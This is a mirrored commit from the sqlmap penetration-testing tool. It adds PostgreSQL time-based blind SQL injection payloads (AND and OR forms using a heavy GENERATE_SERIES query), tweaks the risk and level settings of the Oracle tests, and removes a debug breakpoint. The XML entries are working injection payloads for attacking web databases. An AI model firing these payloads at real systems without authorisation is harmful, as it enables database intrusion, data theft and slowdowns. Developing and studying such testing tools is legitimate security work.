sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-02-02 20:54:13 +03:00
Code Issues Packages Projects Releases Wiki Activity

introducing PostgreSQL time based blind

Browse Source
This commit is contained in:
Miroslav Stampar 2010-12-07 00:51:14 +00:00
parent 1ba98dc9ec
commit 0da1ebde7d
2 changed files with 39 additions and 13 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
lib/controller/checks.py
View File

@ -361,8 +361,6 @@ def checkSqlInjection(place, parameter, value):
injectable = True
elif check == "[DELAYED]":
if duration >= max(TIME_MIN_DELTA, TIME_N_RESPONSE * kb.responseTime):
import pdb
pdb.set_trace()
infoMsg = "%s parameter '%s' is '%s' injectable " % (place, parameter, title)
logger.info(infoMsg)

50
xml/payloads.xml
View File

@ -1463,7 +1463,7 @@ Formats:
<title>Oracle AND time-based blind</title>
<stype>5</stype>
<level>1</level>
<risk>2</risk>
<risk>1</risk>
<clause>1,2,3</clause>
<where>1</where>
<request>
@ -1480,7 +1480,7 @@ Formats:
<test>
<title>Oracle AND time-based blind (heavy query)</title>
<stype>5</stype>
<level>3</level>
<level>2</level>
<risk>1</risk>
<clause>1,2,3</clause>
<where>1</where>
@ -1495,6 +1495,24 @@ Formats:
</details>
</test>
<test>
<title>PostgreSQL AND time-based blind</title>
<stype>5</stype>
<level>1</level>
<risk>1</risk>
<clause>1,2,3</clause>
<where>1</where>
<request>
<payload>AND EXISTS(SELECT * FROM GENERATE_SERIES(1, 10000000))</payload>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>PostgreSQL</dbms>
</details>
</test>
<test>
<title>Microsoft SQL Server/Sybase AND time-based blind (heavy query)</title>
<stype>5</stype>
@ -1552,10 +1570,6 @@ Formats:
<dbms_version>&gt; 2.0</dbms_version>
</details>
</test>
<!--
NOTE: there is no way to perform this test against Microsoft SQL
Server, Sybase, Oracle or PostgreSQL
-->
<!-- TODO: if possible, add payload for Microsoft Access and SAP MaxDB -->
<!-- End of AND time-based blind tests -->
@ -1635,7 +1649,25 @@ Formats:
<dbms>Oracle</dbms>
</details>
</test>
<test>
<title>PostgreSQL OR time-based blind</title>
<stype>5</stype>
<level>3</level>
<risk>3</risk>
<clause>1,2,3</clause>
<where>2</where>
<request>
<payload>OR EXISTS(SELECT * FROM GENERATE_SERIES(1, 10000000))</payload>
</request>
<response>
<time>[DELAYED]</time>
</response>
<details>
<dbms>PostgreSQL</dbms>
</details>
</test>
<test>
<title>Microsoft SQL Server/Sybase OR time-based blind (heavy query)</title>
<stype>5</stype>
@ -1693,10 +1725,6 @@ Formats:
<dbms_version>&gt; 2.0</dbms_version>
</details>
</test>
<!--
NOTE: there is no way to perform this test against Microsoft SQL
Server, Sybase, Oracle or PostgreSQL
-->
<!-- TODO: if possible, add payload for Microsoft Access and SAP MaxDB -->
<!-- End of OR time-based blind tests -->